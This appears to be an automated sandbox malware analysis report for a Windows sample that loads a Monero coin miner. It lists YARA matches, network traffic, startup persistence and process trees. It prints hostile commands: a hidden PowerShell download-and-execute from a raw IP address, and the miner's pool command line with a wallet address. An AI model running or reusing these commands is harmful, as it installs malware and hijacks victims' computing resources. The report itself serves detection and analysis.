Source: powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.1820169013.000001D9A57A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021332AE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.1927473773.0000021339AB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.1820169013.000001D9A6744000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021333708000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.1845912601.000001D9B5813000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1845912601.000001D9B5956000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1927473773.0000021339B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.org
Source: powershell.exe, 00000004.00000002.1927473773.00000213395A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://oneget.orgX

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49862
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown	Network traffic detected: HTTP traffic on port 49871 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49961 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49939 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49939
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown	Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49895
Source: unknown	Network traffic detected: HTTP traffic on port 49862 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49919 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49872 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49915 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49840
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49961
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49840 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49892 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49919
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49872
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49871
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49895 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49907
Source: unknown	Network traffic detected: HTTP traffic on port 49907 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49840 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49871 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49892 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 204.79.197.203:443 -> 192.168.2.4:49915 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: sslproxydump.pcap, type: PCAP	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 00000009.00000002.2566809285.0000000057280000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000000.1906536489.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000009.00000002.2562842128.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"	Jump to behavior

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_00000001400138E5	0_2_00000001400138E5
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_00000001400154F0	0_2_00000001400154F0
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_0000000140015160	0_2_0000000140015160
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_0000000140015170	0_2_0000000140015170
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_0000000140013175	0_2_0000000140013175
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_0000000140010210	0_2_0000000140010210
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_0000000140016210	0_2_0000000140016210
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_000000014000EA48	0_2_000000014000EA48
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_000000014001366E	0_2_000000014001366E
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_000000014000B758	0_2_000000014000B758
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Code function: 0_2_0000000140012FDD	0_2_0000000140012FDD

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8120 -s 7208

Source: sslproxydump.pcap, type: PCAP	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.2.explorer.exe.c000252000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE	Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 9.2.explorer.exe.c000af2000.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 00000009.00000002.2566809285.0000000057280000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000009.00000002.2591995379.000000C000C00000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000000.1906536489.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000009.00000002.2590132663.000000C000400000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 00000009.00000002.2562842128.0000000010890000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.mine.winEXE@41/42@8/9

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1

Jump to behavior

Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8120
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6592
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7364:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7836:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7632:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1420:120:WilError_03

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

File created: C:\Users\user\AppData\Local\Temp\FB99.tmp

Jump to behavior

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs"

Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe
Source: unknown	Process created: C:\Windows\explorer.exe

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 2568
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE ProcessId = 2568

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\yjYJ8QncaF.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: yjYJ8QncaF.exe	Virustotal: Detection: 66%
Source: yjYJ8QncaF.exe	ReversingLabs: Detection: 60%

Source: unknown	Process created: C:\Users\user\Desktop\yjYJ8QncaF.exe "C:\Users\user\Desktop\yjYJ8QncaF.exe"
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\notepad.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tkaxwgf0.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2E.tmp" "c:\Users\user\AppData\Local\Temp\CSC726D30C7B5874E2AAAC9B4613B9BD62.TMP"
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"
Source: C:\Windows\System32\tasklist.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8120 -s 7208
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6592 -s 7472
Source: unknown	Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Users\user\Desktop\yjYJ8QncaF.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\FB99.tmp\FB9A.tmp\FB9B.bat C:\Users\user\Desktop\yjYJ8QncaF.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {Invoke-WebRequest -Uri 'http://45.144.212.77:16000/setup' -OutFile 'C:\Users\user\AppData\Local\Temp\installer.ps1'; Start-Process 'powershell.exe' -ArgumentList '-ExecutionPolicy Bypass -NoProfile -File \"C:\Users\user\AppData\Local\Temp\installer.ps1\"' -WindowStyle Hidden}"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -File "C:\Users\user\AppData\Local\Temp\installer.ps1"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zh5axkic\zh5axkic.cmdline"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4748.tmp" "c:\Users\user\AppData\Local\Temp\zh5axkic\CSCEDA66CC27474FB7B0303F8DB836219.TMP"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\notepad.exe --donate-level 2 -o pool.hashvault.pro:443 -u 494k9WqKJKFGDoD9MfnAcjEDcrHMmMNJTUun8rYFRYyPHyoHMJf5sesH79UoM8VfoGYevyzthG86r5BTGYZxmhENTzKajL3 -k -p x --cpu-max-threads-hint=40	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FI "PID eq 2568"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\win_update.bat" "	Jump to behavior
